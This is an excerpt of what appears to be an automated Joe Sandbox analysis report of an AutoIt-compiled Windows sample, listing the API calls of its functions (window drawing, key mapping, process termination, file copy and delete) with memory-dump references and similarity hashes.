                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00CB8A62
                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00CB8A70
                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00CB8A80
                                                                      • EndPath.GDI32(?), ref: 00CB8A90
                                                                      • StrokePath.GDI32(?), ref: 00CB8AA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                      • String ID:
                                                                      • API String ID: 43455801-0
                                                                      • Opcode ID: 072e375aa9d0e5509b3b769cf4533be92b086fad1b58be6c271eab74bdfd6f95
                                                                      • Instruction ID: 3875a33408708700cb102ed4ff8591a79e8b0c7f7285bc2b7f8f4cec42199d64
                                                                      • Opcode Fuzzy Hash: 072e375aa9d0e5509b3b769cf4533be92b086fad1b58be6c271eab74bdfd6f95
                                                                      • Instruction Fuzzy Hash: EC11C576400109FFEB129F94EC88FAE7F6DEB08354F048122BA599A1A1C7719E55DFA0
                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C21BF4
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C21BFC
                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C21C07
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C21C12
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C21C1A
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C21C22
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: ffeb1182f14e4a45a2d66d06e94a39a89cb9b7c21d0db16fef00c89b947cb706
                                                                      • Instruction ID: 704efd70c65d88b3e04932edc29a776e81e5efe5fc46c7c9c06412d8aec0d335
                                                                      • Opcode Fuzzy Hash: ffeb1182f14e4a45a2d66d06e94a39a89cb9b7c21d0db16fef00c89b947cb706
                                                                      • Instruction Fuzzy Hash: 060167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C8EB30
                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C8EB46
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00C8EB55
                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C8EB64
                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C8EB6E
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C8EB75
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      • Opcode ID: 55168f2f87710c6150d6b37b4a3d370785e376a7e3343969c130587beced3a62
                                                                      • Instruction ID: 264ca7c181da8c3a7205939ad5ea3ce53967bb88866d715157cd861d18d9d054
                                                                      • Opcode Fuzzy Hash: 55168f2f87710c6150d6b37b4a3d370785e376a7e3343969c130587beced3a62
                                                                      • Instruction Fuzzy Hash: 20F03A72240158BBE7215B629C4EFEF3B7CEFCAB11F000269FA11E1091E7A05A01C6B5
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C8187F
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00C8188B
                                                                      • CloseHandle.KERNEL32(?), ref: 00C81894
                                                                      • CloseHandle.KERNEL32(?), ref: 00C8189C
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C818A5
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C818AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: 1937814c491f310dfce94804b11af9fabcb9a98d55a597651c2198325cc39676
                                                                      • Instruction ID: 3d0ed40f6cd388fde6f4f9e5b0b4d6c3040d4634f6f61a7f5dda520443dd3c1c
                                                                      • Opcode Fuzzy Hash: 1937814c491f310dfce94804b11af9fabcb9a98d55a597651c2198325cc39676
                                                                      • Instruction Fuzzy Hash: 6FE0C276004101BBDA015FA5ED4CB4EBB69FB59B22B508321F225A1070CB329420DB60
                                                                      APIs
                                                                        • Part of subcall function 00C27620: _wcslen.LIBCMT ref: 00C27625
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C8C6EE
                                                                      • _wcslen.LIBCMT ref: 00C8C735
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C8C79C
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C8C7CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                      • String ID: 0
                                                                      • API String ID: 1227352736-4108050209
                                                                      • Opcode ID: 699daac482b1f0eaaa5e613b3ca91ae6e9e4a95888b5edfe1e0c0c0727b4f364
                                                                      • Instruction ID: b1d13fe02fbcbae4711c023bf531008b19547a43ad5a23d264aa879322e6da09
                                                                      • Opcode Fuzzy Hash: 699daac482b1f0eaaa5e613b3ca91ae6e9e4a95888b5edfe1e0c0c0727b4f364
                                                                      • Instruction Fuzzy Hash: CD51BF716143019BD754AF28C8C5B6B77E8AF49318F040A2DF9A5D31A0DB70DE04DB6A
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C81E66
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C81E79
                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C81EA9
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 2081771294-1403004172
                                                                      • Opcode ID: a4d3e138fc9a44ffe926df00e98d5a8766399009a50e22d506e223d4bb1693b4
                                                                      • Instruction ID: 190b53c57860b573a1d2c21e9f7f58d268fb9b74cfd176db29d972e718209322
                                                                      • Opcode Fuzzy Hash: a4d3e138fc9a44ffe926df00e98d5a8766399009a50e22d506e223d4bb1693b4
                                                                      • Instruction Fuzzy Hash: 0321F371A00104ABDB14AB65EC89DFFB7BCEF45358F184129FC25A71E1DB744A0AA720
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C44D1E,00C528E9,?,00C44CBE,00C528E9,00CE88B8,0000000C,00C44E15,00C528E9,00000002), ref: 00C44D8D
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C44DA0
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00C44D1E,00C528E9,?,00C44CBE,00C528E9,00CE88B8,0000000C,00C44E15,00C528E9,00000002,00000000), ref: 00C44DC3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: cffedbc6aaea02fc72162c64b9067c22c7d900c0c63523aa67cf7ab52288c137
                                                                      • Instruction ID: 3ef9e3f13c2ad85737da8d371171721b8a92b8cd12a6dfa89cd5f92035d3a3f4
                                                                      • Opcode Fuzzy Hash: cffedbc6aaea02fc72162c64b9067c22c7d900c0c63523aa67cf7ab52288c137
                                                                      • Instruction Fuzzy Hash: 00F04F35A40208BBDB159F94DC89BADBFF9FF44751F1001A8F90AA2260CB715A41DB90
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C24EDD,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C24EAE
• FreeLibrary.KERNEL32(00000000,?,?,00C24EDD,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24EC0
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
• Opcode ID: c5f2c85021aabc99e4f7f02e8ff8f2dfe8014a6d421370201af247701179a96a
• Instruction ID: 901ca83ae5cfce3ee241049e18614def399806c5e381ebb96be0e521fb73f435
• Opcode Fuzzy Hash: c5f2c85021aabc99e4f7f02e8ff8f2dfe8014a6d421370201af247701179a96a
• Instruction Fuzzy Hash: A5E0CD36A027325BE2311729BC5CB5FA558AF81F62F060225FC10F3240DBA0CE0240B0
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C63CDE,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E62
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C24E74
• FreeLibrary.KERNEL32(00000000,?,?,00C63CDE,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E87
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
• Opcode ID: 5174a198e616a4289d098b1745ab0250853107833725d91125d1cbac01d7cfbe
• Instruction ID: a5619f825b3202c7654cb2528b62bbfbad0e8ebf1541256f2a11a554996a19ee
• Opcode Fuzzy Hash: 5174a198e616a4289d098b1745ab0250853107833725d91125d1cbac01d7cfbe
• Instruction Fuzzy Hash: 4DD01236502632576A261B297C5CF8FAA18AF85B517060625F915B6124CF60CE0285E0
APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C92C05
• DeleteFileW.KERNEL32(?), ref: 00C92C87
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C92C9D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C92CAE
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C92CC0
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: File$Delete$Copy
• String ID:
• API String ID: 3226157194-0
• Opcode ID: 8432cb8aabcdb59cc3d1bb508ccb3660ff837f8471973aded51ffdaae04ff6aa
• Instruction ID: 8f92a7e2bd3797693fa224c90f3c0d2f7934701e2185a50d4c872ad6cbf7b6a5
• Opcode Fuzzy Hash: 8432cb8aabcdb59cc3d1bb508ccb3660ff837f8471973aded51ffdaae04ff6aa
• Instruction Fuzzy Hash: 61B14D72E00129ABDF25EFA4CC89EDEB7BDEF48350F1040A6F509E6141EA319E449F61
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00CC3700), ref: 00C5BB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,00CF121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C5BC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,00CF1270,000000FF,?,0000003F,00000000,?), ref: 00C5BC36
• _free.LIBCMT ref: 00C5BB7F
  • Part of subcall function 00C529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000), ref: 00C529DE
  • Part of subcall function 00C529C8: GetLastError.KERNEL32(00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000,00000000), ref: 00C529F0
• _free.LIBCMT ref: 00C5BD4B
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0
• Opcode ID: 795204dc61ba270fd77a27bd0e1ffc9e0a6aaa323f7592ecd5f5cb8f6605a213
• Instruction ID: 087778ad96951e2e493daedd1b08e11f2ea3e394ad88eb525be2748437475db2
• Opcode Fuzzy Hash: 795204dc61ba270fd77a27bd0e1ffc9e0a6aaa323f7592ecd5f5cb8f6605a213
• Instruction Fuzzy Hash: 03510B75900209DFCB10DFA5DC81ABEBFB8EF41321B14026AED64E71A1EB705E89D758
APIs
  • Part of subcall function 00C8DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C8CF22,?), ref: 00C8DDFD
  • Part of subcall function 00C8DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C8CF22,?), ref: 00C8DE16
  • Part of subcall function 00C8E199: GetFileAttributesW.KERNEL32(?,00C8CF95), ref: 00C8E19A
• lstrcmpiW.KERNEL32(?,?), ref: 00C8E473
• MoveFileW.KERNEL32(?,?), ref: 00C8E4AC
• _wcslen.LIBCMT ref: 00C8E5EB
• _wcslen.LIBCMT ref: 00C8E603
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C8E650
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
• Opcode ID: ecb4c5dc828945c6350554b2f83b9e816806a15ed83af25bfab9a67fd8823e31
• Instruction ID: 0d7b04cf528491938c7e8f9b9c2b1d8296b9ecc82edb081d8ea9710c7b7d6fca
• Opcode Fuzzy Hash: ecb4c5dc828945c6350554b2f83b9e816806a15ed83af25bfab9a67fd8823e31
• Instruction Fuzzy Hash: D25162B25083455BC734FBA0D8819DFB3ECAF85344F00492EF599D3191EF74A688976A
APIs
• VariantInit.OLEAUT32(?), ref: 00C88BCD
• VariantClear.OLEAUT32 ref: 00C88C3E
• VariantClear.OLEAUT32 ref: 00C88C9D
• VariantClear.OLEAUT32(?), ref: 00C88D10
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C88D3B
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: 2261bc14d92bbf0f751a94d42746f91dff2d27ef3141a4ebddcdbc67b7e122fc
• Instruction ID: 79db256667961928e3af625c272c57da4ed6100eeeaec7d2c61862a287287907
• Opcode Fuzzy Hash: 2261bc14d92bbf0f751a94d42746f91dff2d27ef3141a4ebddcdbc67b7e122fc
• Instruction Fuzzy Hash: B5518AB5A0021AEFCB10DF28C884AAAB7F8FF89314F11855AE915DB350E730E911CF94
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C98BAE
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C98BDA
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C98C32
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C98C57
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C98C5F
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: 3d5664939930cf00f18c608d5ba8ab8223c55ae45fcc6dc48e93ef9eb5d3de9d
• Instruction ID: 1f6a759f03e27b13732a94f7a076f7e26aeac0697b75a2cae83ece984eb85130
• Opcode Fuzzy Hash: 3d5664939930cf00f18c608d5ba8ab8223c55ae45fcc6dc48e93ef9eb5d3de9d
• Instruction Fuzzy Hash: 65515A35A002159FCF00DF64C884A6EBBF5FF49314F088468E849AB362CB31ED51DB90
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 00CB6C33
• SetWindowLongW.USER32(?,000000EC,?), ref: 00CB6C4A
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00CB6C73
• ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C9AB79,00000000,00000000), ref: 00CB6C98
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00CB6CC7
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: Window$Long$MessageSendShow
• String ID:
• API String ID: 3688381893-0
• Opcode ID: 2364f42d8c6bff2af8aa53c012939faf70840343515a4c9584f07c3cab478535
• Instruction ID: 8c29f325cf4171fc246e56ff97eb63392fdbef5253930a8cbb112eb0c425f808
• Opcode Fuzzy Hash: 2364f42d8c6bff2af8aa53c012939faf70840343515a4c9584f07c3cab478535
• Instruction Fuzzy Hash: DA41C335604104AFDB24CF68CC98FF97FA9EB09360F150268F9A5A72E0C775EE41DA90
APIs
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: e1dd813f3641a48ce2b5ab09fe81710fb601c21ddce7a51f57748d023ca6789c
• Instruction ID: fa6b7377ab81cdf116e6791d22d187a618dc94ccb7abf54804f5678439df67c2
• Opcode Fuzzy Hash: e1dd813f3641a48ce2b5ab09fe81710fb601c21ddce7a51f57748d023ca6789c
• Instruction Fuzzy Hash: 59410436E002009FCB24DF78C980A5EB3F5EF8A310F154568E916EB392D731AE45DB84
                                                                      APIs
